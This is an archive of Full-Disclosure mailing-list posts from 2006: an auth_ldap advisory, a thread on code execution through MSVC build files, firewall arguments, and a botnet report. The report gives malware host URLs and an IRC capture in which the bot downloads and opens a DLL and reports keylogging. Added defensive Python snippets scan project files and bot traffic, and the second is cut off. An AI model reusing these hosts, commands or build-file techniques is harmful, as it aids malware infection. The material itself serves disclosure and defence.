Problem Description: A format string flaw was discovered in the way that auth_ldap logs information which may allow a remote attacker to execute arbitrary code as the apache user if auth_ldap is used for authentication. This update provides version 1.6.1 of auth_ldap which corrects the problem. Only Corporate Server 2.1 shipped with a supported auth_ldap package.
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0150
Updated Packages:
Corporate Server 2.1:
a579c887e48daaa8281ecdc4e1381fa0 corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.i586.rpm
3af337e3989aed18d9c6e634ecb3e47b corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm
Corporate Server 2.1/X86_64:
b3c27d91b6fa68e557507318c8e18f0c x86_64/corporate/2.1/RPMS/mod_auth_ldap-1.6.1-1.2.C21mdk.x86_64.rpm
3af337e3989aed18d9c6e634ecb3e47b x86_64/corporate/2.1/SRPMS/auth_ldap-1.6.1-1.2.C21mdk.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com
Re: [Full-disclosure] Security Bug in MSVC
On 1/19/06, redsand [EMAIL PROTECTED] wrote: i think the author of this advisory is desperate for advisories or attention.
Well maybe the guy was just misled because Microsoft led him to believe it was something exciting? Either way it seems like anyone could open a project file in notepad and insert/modify anything they want in there. I mean it's not like we've ever been able to trust projects or Makefiles/configures anyways.
either way he needs to open a disassembler and work on something else.
-sb
Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example )
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation.
Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan]
Lots of interest! -Adriel
-Original Message- From: Vincent van Scherpenseel [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Sent: Thu, 19 Jan 2006 21:33:50 +0100 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools [AutoScan]
Ha! Funny to see a video demo of some code I've written. My alias is 'rastakid' and I wrote the metasploit plugin for AutoScan. It's basically just a perlscript using the GTK2 libraries. AutoScan is a tool which makes it incredibly easy to call external applications with its scanresults as arguments (like IP addresses). Please note: AutoScan is not developed by me, only the Metasploit plugin. I was forced to stop development a couple of months ago because I got really busy with school and left my parent's house so I had no time to work on it anymore. I'm thinking about continuing development if I get more time and there's interest in it. - Vincent 'rastakid' van Scherpenseel
[EMAIL PROTECTED] wrote: Dre, Awesome! Thank you!! -Adriel
-Original Message- From: Andre Ludwig [EMAIL PROTECTED] To: [EMAIL PROTECTED] [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Wed, 18 Jan 2006 13:26:54 -0500 Subject: Re: [Full-disclosure] Vulnerability/Penetration Testing Tools
http://autoscan.free.fr/index.html Used to do nessus, nmap, and metasploit via the scripting menu.. Haven't toyed with it in a long while so you may want to check it out and verify it still does all of that. video of it in action here http://eks0.free.fr/whax-demos/?f=autoscan-metasploit_config.xml Dre
On 1/18/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Wed, 18 Jan 2006 11:36:04 CST, Madison, Marc said: Developer $60K/year divided by the adopted 2080 man hours year (this is the average hours work, 40 hour week, 5 days, etc...) = $28.85/hourly, That's the *unencumbered* cost. Now add in the employer cost of health insurance (probably close to $400 or more a month), FICA Medicare, Social Security, workman's comp, pension plan - right there that's another 25% in addition to that $28.85. Now he's costing you $35/hour. And we're not done yet. Then add in the cost of his office - if he has a 10x10 cubicle, and commercial space rents for $10/square foot/mo, that's another $12,000/year. Now add in electricity, the cost of administrative assistants and HR people to support it (unless it's a *small* shop and doesn't have assistants and HR), and so on. Oh, and if you buy him a new $3,000 workstation every third year, that's another $1K/year. This shit adds up. That's why the rule of thumb is the real cost of a technical hire is twice the salary... Like you said, many people make that comparison, and don't calculate the *TOTAL* cost. That's what I said..;)
Re: [Full-disclosure] PC Firewall Choices
My personal favorite was the older versions of Tiny Personal Firewall, though they did have the major flaw of popping up stuff when the computer was locked thus I stopped using it. They fixed it, but the revamped interface they put out a couple years ago wasn't to my liking. What do you think of the current Tiny compared to ZA? -sb
On 1/17/06, Steven [EMAIL PROTECTED] wrote: I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third party product on a bunch of Windows machines. I am trying to determine what product to go with and wanted to solicit some opinions from this mailing list. The four that I really come across and have used in some cases are ZoneAlarm, Sygate, Norton, Kerio, and Tiny. My understanding is that Norton has actually acquired Sygate and that the Sygate Personal Firewall probably wouldn't be the best choice of these now. With that in mind I am looking for a product that is easy to set up, easy to use, works well, and does not take up too much in terms of system resources or hard drive space (I also don't want it to add 20 minutes to the boot process either). I am not looking for e-mail protection, antivirus, or any other non-firewall type services to be included. I do however want it to be able to manage applications and their internet usage. (i.e. if they install something new that tries to access the web (trojans included) they will get a popup telling them something is doing this). Any suggestions and opinions on the above products and any others that I might not have mentioned are welcomed. Also -- on top of this if someone knows of software/hardware that can scan these machines and verify whether or not both the SP2 FW and/or the 3rd party FW -- and perhaps prevent them network access if they are not running -- please let me know. [I am not sure what security products have these capabilities] Thanks Steven
Re: [Full-disclosure] Security Bug in MSVC
not up to you.
redsand wrote: like selling all my M$ Excel exploits
[EMAIL PROTECTED] wrote: and me I think most FD members are desperate of such newcomer comments, you have nothing to say interesting about his work he's doing before you were born.
redsand wrote: i think the author of this advisory is desperate for advisories or attention. either way he needs to open a disassembler and work on something else.
Pavel Kankovsky wrote: On Tue, 17 Jan 2006, Morning Wood wrote: extract, and open hello.dsw click batch build, build or rebuild all code will execute ( calc.exe and notepad.exe used as an example )
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it. (Indeed, there are some marginal cases like when you want to build an executable file intended to run on someone else's computer...) --Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ] Resistance is futile. Open your source code and prepare for assimilation.
Re: [Full-disclosure] Security Bug in MSVC
What's the point of building a bunch of sources unless 1. you trust their author, or 2. you have made sure there is nothing malicious there? When you build an executable from untrusted sources, you get an untrusted executable. Either you run it and you're screwed anyway, or you don't run it and you wasted your time building it.
again... this does not exploit the source code. it does exploit the build files. if i was simply compiling badprog.c then launching it, that would be stupid. i am leveraging the project files, not the source code. MW
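The thread's point that project files, not just sources, need review before a build, shown as an added example that is not part of the original posts: a pre-open audit that lists every command a Visual C++ 6 `.dsp` would run. The thread does not say which project-file field the advisory used; the `PreLink_Cmds`/`PostBuild_Cmds` keys and `Custom Build` blocks checked here are an assumption about the `.dsp` format, and the sample file and `EXPECTED_TOOLS` policy are constructed.

```python
import re

# Assumption (not stated in the thread): the command-bearing parts of a VC6
# .dsp are the PreLink_Cmds / PostBuild_Cmds keys inside a "Special Build Tool"
# block and the indented command lines inside a "Custom Build" block.
CMD_KEYS = ("PreLink_Cmds", "PostBuild_Cmds")
# Hypothetical site policy: tools a reviewer expects to see in build steps.
EXPECTED_TOOLS = {"copy", "xcopy", "echo", "mkdir", "midl", "rc"}
ALL_CONFIGS = "(all configurations)"

# Constructed sample project file, not taken from the advisory.
SAMPLE_DSP = "\n".join([
    '# Microsoft Developer Studio Project File - Name="hello" - Package Owner=<4>',
    '!IF  "$(CFG)" == "hello - Win32 Release"',
    '# Begin Special Build Tool',
    'SOURCE="$(InputPath)"',
    'PostBuild_Desc=Copying binary',
    'PostBuild_Cmds=copy Release\\hello.exe ..\\bin\tcalc.exe',
    '# End Special Build Tool',
    '!ELSEIF  "$(CFG)" == "hello - Win32 Debug"',
    '!ENDIF',
    '# Begin Source File',
    'SOURCE=.\\hello.cpp',
    '# Begin Custom Build',
    'InputPath=.\\hello.cpp',
    '"$(OutDir)\\stamp.txt" : $(SOURCE)',
    '\tnotepad.exe',
    '\techo done > "$(OutDir)\\stamp.txt"',
    '# End Custom Build',
    '# End Source File',
])

CFG_RE = re.compile(r'^!(?:ELSE)?IF\s+"\$\(CFG\)"\s*==\s*"([^"]+)"')


def tool_name(command):
    """First token of a command, lower-cased, without directory or extension."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', command)
    if not m:
        return ""
    base = re.split(r"[\\/]", m.group(1) or m.group(2))[-1].lower()
    return re.sub(r"\.(exe|com|bat|cmd)$", "", base)


def scan_dsp(text):
    """Return every command the project file would run, with its context."""
    findings = []
    config, source, block, in_source = ALL_CONFIGS, None, None, False

    def add(where, lineno, command):
        tool = tool_name(command)
        findings.append({
            "line": lineno, "where": where, "config": config, "source": source,
            "command": command, "tool": tool,
            # '&' or '|' can chain a second program behind an expected tool.
            "expected": tool in EXPECTED_TOOLS and not re.search(r"[&|]", command),
        })

    for lineno, line in enumerate(text.splitlines(), 1):
        m = CFG_RE.match(line)
        if m:
            config = m.group(1)
        elif line.startswith("!ENDIF"):
            config = ALL_CONFIGS
        elif line.startswith("# Begin "):
            name = line[len("# Begin "):]
            if name.startswith("Special Build Tool"):
                block = "Special Build Tool"
            elif name.startswith("Custom Build"):
                block = "Custom Build"
            elif name.startswith("Source File"):
                in_source, source = True, None
        elif line.startswith("# End "):
            name = line[len("# End "):]
            if block and name.startswith(block):
                block = None
            elif name.startswith("Source File"):
                in_source, source = False, None
        elif block == "Special Build Tool":
            key, sep, value = line.partition("=")
            if sep and key.strip() in CMD_KEYS:
                # Several commands share one line, separated by tabs.
                for cmd in value.split("\t"):
                    if cmd.strip():
                        add(key.strip(), lineno, cmd.strip())
        elif block == "Custom Build":
            # Makefile-style: command lines are the indented ones.
            if line[:1] in (" ", "\t") and line.strip():
                add("Custom Build", lineno, line.strip())
        elif in_source and line.startswith("SOURCE="):
            source = line[len("SOURCE="):].strip('"')
    return findings


def unexpected(findings):
    """Commands a reviewer should read before opening or building the project."""
    return [f for f in findings if not f["expected"]]


if __name__ == "__main__":
    for f in scan_dsp(SAMPLE_DSP):
        flag = "ok    " if f["expected"] else "REVIEW"
        print("%s line %-3d %-15s [%s] %s"
              % (flag, f["line"], f["where"], f["config"], f["command"]))
```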
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. Never had the problem with Kaspersky. I do know that configuring a firewall right takes some knowledge and I know I don't know how to do that and ZA did not come with instructions telling me that, but Kaspersky was intuitive. It just popped up and asked if you want to let a certain application get on the internet and you answer yes or no and then it remembers. I think someone who did not even know what a firewall is could use it on their computer without problems like a typical end user. That impresses me. With the proliferation of broadband I think the typical home user should have a software firewall if they have broadband. Naturally a friend of mine had Windows XP and Norton Firewall and his machine on broadband got hacked anyway. But that is consumer Norton and that is another story which would be off topic to this subject. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web
At 03:51 PM 1/19/2006, Stan Bubrouski wrote: On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: Stan Bubrouski wrote in news:[EMAIL PROTECTED] As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. Since nobody has ever claimed that ZA is perfect, in saying this you prove Yeah I didn't literally mean perfect, only that certain people seem to argue that everyone's complaints about ZA aren't real because they don't experience them. What proof could I proffer here? Some flawed benchmark? A video? Why would I bother you assume I'm lying anyways. that your claims are either lies or hyperbole. If you can't argue with what So because you think that one sentence is misleading (in retrospect 'perfect' was not a good word choice), everything else I said must be untrue. Sigh. people actually said, making up things that they didn't say is fatuously dishonest. You are the one being dishonest and the one exaggerating here. You take something too literally, and call people liars. Two machines, one with NPF one with ZA. When ZA is running on one, IE is slow, when its off its slightly faster than the machine with NPF. It's not a lie, its reality. You can fly here and come see for yourself, but you can't touch anything. I don't know where you've been. -sb cheers, DaveK -- Can't think of a witty .sigline today Roses are Red, Violets are Blue, How much is ZA paying...YOU!
RE: [Full-disclosure] Re: Re: PC Firewall Choices
-Original Message- From: Stan Bubrouski [mailto:[EMAIL PROTECTED] Sent: Friday, 20 January 2006 8:37 AM To: Greg Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices On 1/19/06, Greg [EMAIL PROTECTED] wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Stan Bubrouski Sent: Friday, 20 January 2006 7:51 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices On 1/19/06, Dave Korn [EMAIL PROTECTED] wrote: Stan Bubrouski wrote in news:[EMAIL PROTECTED] As cruel as that last message was I'm sick of the ZA pros here saying its perfect, its not, far from it. Since nobody has ever claimed that ZA is perfect, in saying this you prove Yeah I didn't literally mean perfect, only that certain people seem to argue that everyone's complaints about ZA aren't real because they don't experience them. What proof Actually, seeing no-one actually said that, I suppose that is a pointer towards you REALLY meaning that YOU cant make the prog do something therefore no-one can. I said it slowed down IE on machines here and some apps wouldn't start. Where did I claim that everyone had this problem? Again just because something doesn't affect you doesn't mean ZA isn't at fault... unless you are sitting at the exact same computer as me I don't see how you can know this... SNIP useful text that should have been sent in separate message could I profer here? Some flawed benchmark? A video? Why would I bother you assume I'm lying anyways. that your claims are either lies or hyperbole. If you can't argue with what So because you think that one sentence is misleading (in retrospect 'perfect' was not a good word choice), everything else I said must be untrue. Sigh. people actually said, making up things that they didn't say is fatuously dishonest. You are the one being dishonest and the one exaggerating here. 
You take something too literally, and call people Actually, I would have to agree with him that it was you doing that. You either lied or exaggerated above as I pointed out. Deal with it. How selectively we read. He accused me of lying about using the word perfect (I didn't mean it literally) and then said my claims that ZA slowed down IE and caused some apps not to load here are either lies or exaggerated because he says so. And now because you say so... you've convinced me! Is there some benchmark you'd like me to run to prove it to you? I don't think anymore needs be said. Your mistakes, above, are enough to condemn you by your own word so for the sake of not making this any worse, we'll leave it here. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
On 1/19/06, Greg [EMAIL PROTECTED] wrote:
> I don't think anymore needs be said. Your mistakes, above, are enough to condemn you by your own word so for the sake of not making this any worse, we'll leave it here.

What a convenient cop-out.

-sb
RE: [Full-disclosure] Re: Re: PC Firewall Choices
-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer
Sent: Friday, 20 January 2006 2:30 PM
To: Stan Bubrouski; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices

> I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can.

That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored.

You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least.

You CAN set certain programs to pass by its lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you can't. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA.
FW: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice)
From: William DeRieux [mailto:[EMAIL PROTECTED]
Sent: Thursday, January 19, 2006 10:24 PM
To: 'Nancy Kramer'
Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices (an alternative choice)

You could try 8Signs firewall (it is designed with servers in mind, but works for home desktops just as well). 8Signs firewall, not free though, has a wizard that walks you through creating a ruleset, asking you what services you want to run: webserver, emailserver, etc., even things that aren't servers.

Plus it is really easy to use. If you initially tell it to block all traffic unless there is a rule for that particular traffic, no packets or data that don't have a corresponding rule will be able to get through. You can right-click on that traffic in the program's log window and tell it to make a ruleset for the specific traffic, and choose to block or accept incoming/outgoing connections or both (as simple as point and click). I haven't had any trouble with it, and have been running it for about half of a year.

It has TCP, UDP, ICMP, ARP, RARP, Mac Address Rules - with different configuration for each network adapter, both ethernet and wireless. It also has a configuration wizard for each adapter. And has the following other options:

* SYN Flood Protection
* Port Scan Protection
* and Automatic and Manual Ban List (for flooding, port scanning, etc)

It even has a built-in learning mode. You can look them up here: http://www.consealfirewall.com/

William

(*note I am not trying to ADVERTISE THIS PRODUCT, I AM just trying to help give someone an alternative, they may not have known about*)

FC, ROCKS!

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer
Sent: Thursday, January 19, 2006 10:30 PM
To: Stan Bubrouski; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices

I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why.
I just can't get on and when I shut it down I can. Never had the problem with Kaspersky. I do know that configuring a firewall right takes some knowledge and I know I don't know how to do that and ZA did not come with instructions telling me that, but Kaspersky was intuitive. If just popped up and asked if you want to let a certain application get on the internet and you answer yes or no and then it remembers. I think someone who did not even know what a firewall is could use it on their computer without problems like a typical end user. That impresses me. With the proliferation of broadband I think the typical home user should have a software firewall if they have broadband. Naturally a friend of mine had Windows XP and Norton Firewall and his machine on broadband got hacked anyway. But that is consumer Norton and that is another story which would be off topic to this subject. Regards, Nancy Kramer Webmaster http://www.americandreamcars.com Free Color Picture Ads for Collector Cars One of the Ten Best Places To Buy or Sell a Collector Car on the Web -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.1.371 / Virus Database: 267.14.21/235 - Release Date: 1/19/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Re: Re: PC Firewall Choices
I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. 
You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Re: Re: PC Firewall Choices
I have been following this discussion waiting for someone to mention another feature of Zone Alarm: Posted January 13, 3:00 a.m. PST Pacific Time, ROBERT X. CRINGELY http://www.infoworld.com/ A Perfect Spy? It seems that ZoneAlarm Security Suite has been phoning home, even when told not to. Last fall, InfoWorld Senior Contributing Editor James Borck discovered ZA 6.0 was surreptitiously sending encrypted data back to four different servers, despite disabling all of the suite's communications options. Zone Labs denied the flaw for nearly two months, then eventually chalked it up to a bug in the software -- even though instructions to contact the servers were set out in the program's XML code. A company spokesmodel says a fix for the flaw will be coming soon and worried users can get around the bug by modifying their Host file settings. However, there's no truth to the rumor that the NSA used ZoneAlarm to spy on U.S. citizens. :) Hummer - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: Greg [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, January 19, 2006 11:27 PM Subject: RE: [Full-disclosure] Re: Re: PC Firewall Choices I have the paid ZA but I heard the free one was better. Have no idea about that but would never buy the paid version again. At least now I know what was happening. Will try to look for that feature and set it to the maximum minutes. I only have it on my laptop which only goes on the internet sporadically but generally goes on the internet on public wireless networks which I think may not be all that secure. Lots of times I am meeting with someone there and we talk and then lookup something on the internet. I could see how time could pass quickly and I might not touch the computer for awhile. Thanks for the explanation. 
Regards, Nancy Kramer At 10:10 PM 1/19/2006, Greg wrote: -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Nancy Kramer Sent: Friday, 20 January 2006 2:30 PM To: Stan Bubrouski; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Re: Re: PC Firewall Choices I admit I know nothing about firewalls but with ZA I have had to shut it down sometimes to go onto the internet. I have no idea why. I just can't get on and when I shut it down I can. That'd be a well known and never fixed bug I reported to Zonelabs some years back now. It has a feature to automatically lock internet connection after so many minutes of inactivity. The length of time can be changed by the user. What it REALLY did was cut off access to internet and any LAN you were on, isolating you entirely and never actually let go of it when the user was back at the keyboard. Exiting ZA let that go and internet and lan were restored. You have the option to turn that feature OFF but even that didn't stop the whole thing happening. So, about the only thing you could do was to set the auto lock as high as it could go and turn the feature off. It would still go off after that many minutes had passed (which I believe is 999 in the PRO version and 99 in the free version) and lock you out again but it was delayed by that much, at least. You CAN set certain programs to pass by its' lock, however. So, if you have some computers almost always chattering away on a distributed project but otherwise not touched, you could allow those programs to pass on even though, should you attempt to get out with a simple web browser (where it wasn't allowed to pass the lock), you cant. Saves some stuffing about on such machines and let's face it - the more free some company execs see, the more likely they are to use it. Surprising how many Windows based companies use free ZA. ___ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.1.375 / Virus Database: 267.14.19/231 - Release Date: 1/16/2006 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Possible large botnet
Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this.

D O N O T C L I C K
http://213.17.233.194/mediabar.wmf
http://213.17.233.194/stat_s3.php
http://213.17.233.194/stat.html
D O N O T C L I C K

This injects a trojan connecting to 219.240.142.59 on port 44234

44234/tcp open irc Unreal ircd
47292/tcp open irc Unreal ircd
47296/tcp open irc Unreal ircd
54729/tcp open irc-proxypsyBNC 2.3.1

Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find http://219.240.142.59/usage/, containing some interesting links and info about when this most likely started.

The tcp stream below demos the login, and calling of http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k hits on this particular file(!).

NICK *
USER plnaehe 0 0 :*
:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
:irc.foonet.com NOTICE AUTH :*** Found your hostname
:irc.foonet.com 001 *:Welcome to the ROXnet IRC Network *
:irc.foonet.com 002 *:Your host is irc.foonet.com, running version Unreal3.2.3
:irc.foonet.com 003 *:This server was created Thu Oct 13 2005 at 17:25:57 KST
:irc.foonet.com 005 *SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
:irc.foonet.com 005 *SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT [EMAIL PROTECTED] EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.foonet.com 251 *:There are 1 users and 1194 invisible on 1 servers
:irc.foonet.com 252 *1 :operator(s) online
:irc.foonet.com 253 *201 :unknown connection(s)
:irc.foonet.com 254 *10 :channels formed
:irc.foonet.com 255 *:I have 1195 clients and 0 servers
:irc.foonet.com 265 *:Current Local Users: 1195 Max: 5529
:irc.foonet.com 266 *:Current Global Users: 1195 Max: 1276
:irc.foonet.com 422 *:MOTD File is missing
*MODE *:+iwTxd
USERHOST *
:irc.foonet.com 302 *:*
MODE *-x+B
JOIN #mrbean5 rowan
PRIVMSG *:[KEYLOG]: Key logger active.
USERHOST *
MODE *-x+B
JOIN #mrbean5 rowan
USERHOST *
MODE *-x+B
JOIN #mrbean5 rowan
:irc.foonet.com NOTICE *:BOTMOTD File not found
*MODE *:-x+B
* JOIN :#mrbean5
:irc.foonet.com 332 *#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
:irc.foonet.com 333 *#mrbean5 DDDI 1137401387
:irc.foonet.com 353 *@ #mrbean5 *
:irc.foonet.com 366 *#mrbean5 :End of /NAMES list.
*PRIVMSG *:[KEYLOG]: Key logger active.
:irc.foonet.com 302 *
:irc.foonet.com 302 *
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
:irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
:irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
:irc.foonet.com 404 *#mrbean5 :You need voice (+v) (#mrbean5)
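The indicators visible in the capture above (client PRIVMSG lines that open with a bracketed status tag, a command plus download URL in the channel topic, and a user count that is almost entirely invisible) can be turned into a simple check over reassembled IRC traffic. This is an added example, not part of the original post; the sample stream is constructed, and the server name, nick, channel, file name and the 192.0.2.10 address in it are placeholders.

```python
import re
from collections import Counter

# Constructed sample modelled on the capture in the post. Every name and the
# address (192.0.2.10, a documentation range) is a placeholder.
SAMPLE_STREAM = """\
NICK bot01
USER plnaehe 0 0 :bot01
:irc.example.net 001 bot01 :Welcome to the IRC Network bot01
:irc.example.net 251 bot01 :There are 1 users and 1194 invisible on 1 servers
MODE bot01 -x+B
JOIN #chan key
:irc.example.net 332 bot01 #chan :.wipe http://192.0.2.10/ppp/payload.dll payload.dll 3
PRIVMSG bot01 :[KEYLOG]: Key logger active.
PRIVMSG #chan :[DOWNLOAD]: Downloading URL: http://192.0.2.10/ppp/payload.dll to: payload.dll.
:irc.example.net 404 bot01 #chan :You need voice (+v) (#chan)
PRIVMSG #chan :hello, anyone around?
"""

STATUS_TAG = re.compile(r"^\[([A-Z]{3,})\]:")   # e.g. "[KEYLOG]:" or "[DOWNLOAD]:"
URL = re.compile(r"https?://[^\s<>]+", re.I)
PAYLOAD_EXT = (".dll", ".exe", ".scr", ".wmf")  # assumption: extensions worth flagging
LUSERS = re.compile(r"There are (\d+) users and (\d+) invisible")


def parse_irc_line(line):
    """Split one RFC 1459 message into (prefix, command, params)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
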